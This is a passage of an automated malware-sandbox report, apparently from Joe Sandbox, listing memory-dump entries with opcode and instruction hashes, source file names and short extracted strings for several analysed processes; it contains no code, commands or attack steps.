                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: 25F09630A4DD0BCFF656DB18A4506B93290FF95340F118279D44EC61AAEE28EC1981C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction ID: a08276fa49abe39d026f06bce9d632830a9ff94055a979ab26b8eb21608ff79e
                                                                      • Opcode Fuzzy Hash: b37aa13b1bd767f24f3e470871d6dfd3a9fabd4c5c4778cd171299428205be72
                                                                      • Instruction Fuzzy Hash: 29E04F7194E7C08FC70B973588A88A07F64DE6721174A41EAC045CF6B3DA199C4AC712
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction ID: 31c1be1aecda61acda28c2d3a46695ccd06f9eaabd42630ea7bbeaf9b53ac20d
                                                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction Fuzzy Hash: 89D05E30B6090D4B8B0CA62D8858430F3D1EBAA6067D45278940BC2291ED25ECCA8B80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 4731d078e3a759ba495a7e0e0eb6d7b1bcf92d2f55c84211b01787c8f054e492
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: 6CE0DF31E899478BF304E304D4543F87201AB223A0F04C3B8C44C972E6EE2DAD4886C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7eb3f3cb95d32db81b1de987173e1a5721f33de1c6ed308fca0652d2e3f7c93
                                                                      • Instruction ID: 1d480be921784c5ddb55c92b3ad3c57e5a43663d72f06e4507c217a8dc7f9bdc
                                                                      • Opcode Fuzzy Hash: a7eb3f3cb95d32db81b1de987173e1a5721f33de1c6ed308fca0652d2e3f7c93
                                                                      • Instruction Fuzzy Hash: B2E08C71E6692ECBF764DFA8D8096BDA7B1FB45640F80023AD009D7299CE242C024B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 097c72fa5e49c4a95ac1e1f9c995a91fde8d094d0cd5c3ed92f52ea13d8ce6a2
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: F5D01234B619044F870CA739885987477D1EB6A216B9540A9D00AC76B1D96ADC99C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b06ec6d7558d212b5c990fc77d47e3d6311f41b90ffb9b5fc8fd07c445ff5a58
                                                                      • Instruction ID: c9ece1b77338cc12d630b06b60aa176a70bf63370f2500206dacfed5b20138a0
                                                                      • Opcode Fuzzy Hash: b06ec6d7558d212b5c990fc77d47e3d6311f41b90ffb9b5fc8fd07c445ff5a58
                                                                      • Instruction Fuzzy Hash: D3C08C02F48DBA83F2146228C02067F04429F80248F8004B0E00EC63C6CC0C9B0102C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5\_H$b43$r63$r63
                                                                      • API String ID: 0-904444132
                                                                      • Opcode ID: eff051def05aeb496795f929aaab60cd0d6e6c1ba6fd24e413ce969de9b40e66
                                                                      • Instruction ID: 4e948bfad22383ce87b64c833359e7ab3081276f3de547de1dfb67cdc3ad5bc9
                                                                      • Opcode Fuzzy Hash: eff051def05aeb496795f929aaab60cd0d6e6c1ba6fd24e413ce969de9b40e66
                                                                      • Instruction Fuzzy Hash: 289116B6A18A898FE788DB6CC8657A97FE5FB96310F4441AAD04DD73E2CA7814148780
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b349830e8d72c585c9c88c8ab2991a8cdbc4bd7ec359f36c2d62d03b5e44fcb
                                                                      • Instruction ID: e35496ab4257da2d411b7abd036433755d2770e91425f50b5a76f8a2b84f59b6
                                                                      • Opcode Fuzzy Hash: 9b349830e8d72c585c9c88c8ab2991a8cdbc4bd7ec359f36c2d62d03b5e44fcb
                                                                      • Instruction Fuzzy Hash: B941103264D9149FD714FBACE4899F93BE0EF8632170945BBD08ACB1A3D914AC8187C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: d2da8fb33a745521926a8677901862193db33328efa3c7b4ad3332a367282c46
                                                                      • Instruction ID: 8c62620f2a0312fea6ef22f96121c4920217f0e281c509e780a9b6440c47c0da
                                                                      • Opcode Fuzzy Hash: d2da8fb33a745521926a8677901862193db33328efa3c7b4ad3332a367282c46
                                                                      • Instruction Fuzzy Hash: AFC1CD62A2D6964BE31D4B284C860B577D6EBD3241B18C67DD8DFC7097F928E84BC2C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 72e76148861488b16c5115541b61301888a04f38cf50dbe22fd2f75dd9496606
                                                                      • Instruction ID: f53de22aba54a8f12f6ab51739cf25beb0047462b9da8af6e79313c368e48a23
                                                                      • Opcode Fuzzy Hash: 72e76148861488b16c5115541b61301888a04f38cf50dbe22fd2f75dd9496606
                                                                      • Instruction Fuzzy Hash: 1741A532A0891ACFDB58E758C495BB877A2FB9A350F0542B9D00DD76D6CE286C89C7C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 350b96a10d8fb3f30ba5530322056c178ceaddbc3010c985df6fe25edf3c42da
                                                                      • Instruction ID: 8bf1dbbf139df26b87072b9af06a37ea5ffccfab6ff1b2de761fd2c45e4d6400
                                                                      • Opcode Fuzzy Hash: 350b96a10d8fb3f30ba5530322056c178ceaddbc3010c985df6fe25edf3c42da
                                                                      • Instruction Fuzzy Hash: 03214F71A199598FE798EB28C8566F8B3A1FFA9340F5085F5D04DC31A2CD246DC58B80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 494b05bf56a2571290fd263feeda7ed67e24c714f2de5053d49a9ff5b01798c1
                                                                      • Instruction ID: 379848109fdcca08c0f9ed7aa6898098a715d87b404f6e8972b439e8bdbcad8c
                                                                      • Opcode Fuzzy Hash: 494b05bf56a2571290fd263feeda7ed67e24c714f2de5053d49a9ff5b01798c1
                                                                      • Instruction Fuzzy Hash: AB01BC72F1881ACBEB94EA28C4457BD73E1EFD4351F008576D00DD7180DE28A9D88BC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction ID: 0fb0b3267fff6d9b5198283deacce8a94e31259c5d1254573310772f3fed70aa
                                                                      • Opcode Fuzzy Hash: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction Fuzzy Hash: A7F0E56050E7C04FD71A9A3888684517FA0EF2720134A41EFC045CF1E3DA1D9C89C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction ID: 6642da5c5362c2b8720c4522fa14d1824a09e59127200401373c1df10afea694
                                                                      • Opcode Fuzzy Hash: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction Fuzzy Hash: 0FE0657150E7C48FD71A963888698557FA4EF6720174941EEC045CF1A3EA1D9885C741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction ID: 77caddb6fa254af773627cb71959afec764102713b10ca85366777bc4bd10943
                                                                      • Opcode Fuzzy Hash: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction Fuzzy Hash: 31F0657194A7C08FCB19DA3888A9855BF60EF6720174A42EEC045CF1A7DA2DD88ACB41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction ID: 3a5c915d21f0fd17ae100fb08c38475f9233a177a8b138436f81daddd30c7a8f
                                                                      • Opcode Fuzzy Hash: 9669c547a404fca68f8ed6777d246c21afdc2124e53a4440b28720bff43f21f7
                                                                      • Instruction Fuzzy Hash: 47E0ED6154E7C04FD70A9B74886A9547F60AE6721074A41EEC089CF5B3D61E9849C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
